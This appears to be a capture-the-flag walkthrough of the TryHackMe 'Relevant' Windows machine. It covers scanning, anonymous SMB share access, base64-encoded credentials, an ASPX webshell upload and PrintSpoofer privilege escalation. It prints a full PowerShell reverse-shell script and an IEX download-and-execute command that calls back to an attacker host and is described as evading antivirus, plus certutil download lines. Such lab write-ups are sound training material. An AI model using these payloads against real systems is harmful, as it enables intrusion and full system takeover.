THM Machine Relevant
Here I solve The THM Machine Relevant. There I exploit PrintSpoofer Vulnerability to gain higher privileged account.

Pre-Engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
User.txt
Root.txt
Additionally, the client has provided the following scope allowances:
Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
Locate and note all vulnerabilities found
Submit the flags discovered to the dashboard
Only the IP address assigned to your machine is in scope
Find and report ALL vulnerabilities.
Information Gathering
IP Address
export ip=10.10.111.67
Scanning
Running the nmap
scan to find open ports and the result is like the following.
$ nmap -sC --min-rate 100 --max-rate 200 $ip
PORT STATE SERVICE
80/tcp open http
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2022-08-18T15:08:49+00:00
| ssl-cert: Subject: commonName=Relevant
| Issuer: commonName=Relevant
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-08-17T14:37:56
| Not valid after: 2023-02-16T14:37:56
| MD5: 8705 7420 7bf9 8563 bb66 29f5 cdde fd1d
|_SHA-1: 2c85 81dc 2811 d9b2 0d70 9cf7 593b 6b12 b260 53cc
|_ssl-date: 2022-08-18T15:08:48+00:00; -2m42s from scanner time.
49663/tcp open http
49667/tcp open unknown
Host script results:
|_clock-skew: mean: 1h21m18s, deviation: 3h07m50s, median: -2m42s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-08-18T08:08:49-07:00
| smb2-time:
| date: 2022-08-18T15:08:48
|_ start_date: 2022-08-18T14:38:15
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
From the above scan result, we see the system has the following open ports and services running on it.
Port
80
that is running anhttp
service and possibly running a Windows IIS web server.Port
135
running Microsoft RPC (Remote procedural Call) service is a basic thing when the system is runningsmb
andNetBIOS
service.Port
139
is running thenetbios
servicePort
445
is running thesmb
service andnmap
showed it asmicrosoft-ds
in its result.Port
3389
is an RDP (Remote Desktop Protocol) service that shows some useful information i.e Computer Name, Domain Name, etc.Port
49663
is also running anhttp
service.Port
49667
service is unknown tonmap
they weren't able to guess what type of service is running on it.
Besides all that they also find some other information that we can read in the scan results. Now let's move on to do some information on the running ports.
Enumeration
We saw there is an smb
service running so we can start from it and see if they give us any access with a guest
or anonymous
account (Login without giving him any credentials). We can use the Linux
command line utility smbclient
to access it using the following command.
$ smbclient -L \\\\$ip\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Above we try to list all the shares that are present in the smb
server and we see there is a share that is not come by default i.e nt4wrksv
. The nt4wrksv
share also allowed anonymous login, because I can able to connect to it using the following.
smbclient \\\\$ip\\nt4wrksv
In the share, there is a passwords.txt
file that has the following content.
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
It looks like the password was encoded with base64
, So I decode it with the following command.
$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d && echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
They give me the following output.
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
They are some kind of credentials so I tried it on RDP but It doesn't work. I just keep that in my notes for now and let's move into enumerating some other services.
HTTP
There is more than one http server running on the machine and they just have a default Windows IIS page.
Content-Discovery
I use ffuf
to discover some hidden directories and files but didn't find any useful directory, where we can use the above credentials or do any other things.
I try the nt4wrksv
share name on the web server and luckily it shows status 200. That means that directory exits and when I request for passwords.txt
it shows me its content. I try to upload files from smb
and I was successfully able to do that.
Knowing this we can upload any reverse shell file and execute it by visiting the page. As it's a Windows IIS server that uses aspx
or asp
files as its backend language so we have to use the reverse shell in that language. We can make a reverse shell using msfvenom
but I use /usr/share/webshells/aspx/cmdasp.aspx
and upload it using the following command.
smb: \> put /usr/share/webshells/aspx/cmdasp.aspx
After that I visit the page on this link http://$ip/nt4wrks/cmdasp.aspx
, and they show me the command execution box where I can submit any command and they show me its output.
Initial Access
Now I try to get a reverse shell by uploading reverse shell binary(.exe) generated by msfvenom
but AntiVirus deletes it, Also I cannot able to execute the powershell reverse shell command because the antivirus marks that malicious. So I search on Google and got the following command that downloads a text file that contains powershell reverse shell code and after downloading that they execute it without alerting antivirus software. This is a staged payload in which they execute the first payload that requests the other payload part and executes it to give us a reverse shell.
The Powershell code is the following.
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.11.79.134'
// Setup PORT
$port = '4444'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
There we have to change the $address
variable with the attacker machine IP and the $port
variable with the port we want to use and then save it with the name powershell.reverse.txt
or any filename you like and host it, I use a python
http server for this.
$ python3 -m http.server 80
After hosting that Powershell file executes the following command in your command shell.
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString('http://10.11.79.134/powershell.reverse.txt')"
This will call to your powershell.reverse.txt
file, download it and then execute it, and eventually, you will receive a connection back.
Note: Start your netcat listener first before executing the above command. For Windows, I prefer using the following command to start a listener.
$ rlwarp nc -lvnp 4444
Privilege Escalation
After gaining initial access to the system the next thing we try to achieve is to gain a higher privileged account or access. To do that we enumerate the system to find some misconfiguration or plain text passwords that we can use to get higher access.
We can use a tool name winpeas
that automate all the basic enumeration for us and highlight some ways that can be used to get higher privileges.
I host winpeas.bat
and transfer it using a Python http server, We can also upload that using smb.
certutil.exe -urlcache -split -f http://10.11.79.134/winPEAS.bat winpeas.bat
After running winpeas.bat
we see our user has some permission that is used in privilege escalation.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
There we can see SeImpersonatePrivilege
is enabled and in Windows OS there is a vulnerability or a misconfiguration that is used to get privilege escalation. If a user has this permission enabled then we can use a tool name printspoofer
that can be downloaded from the following link.
https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Download that binary and host it using a Python server or some other way and then download it to the target system using the following command.
certutil.exe -urlcache -split -f http://10.11.79.134/PrintSpoofer64.exe PrintSpoofer64.exe
After that use the following command to exploit the vulnerability to get a higher privileged account.
PrintSpoofer64.exe -i -c cmd.exe
This opens a command prompt with the nt authority\system
account that has all the permissions in the system. Secure both user.txt
and root.txt
flags and submit it.
Last updated
Was this helpful?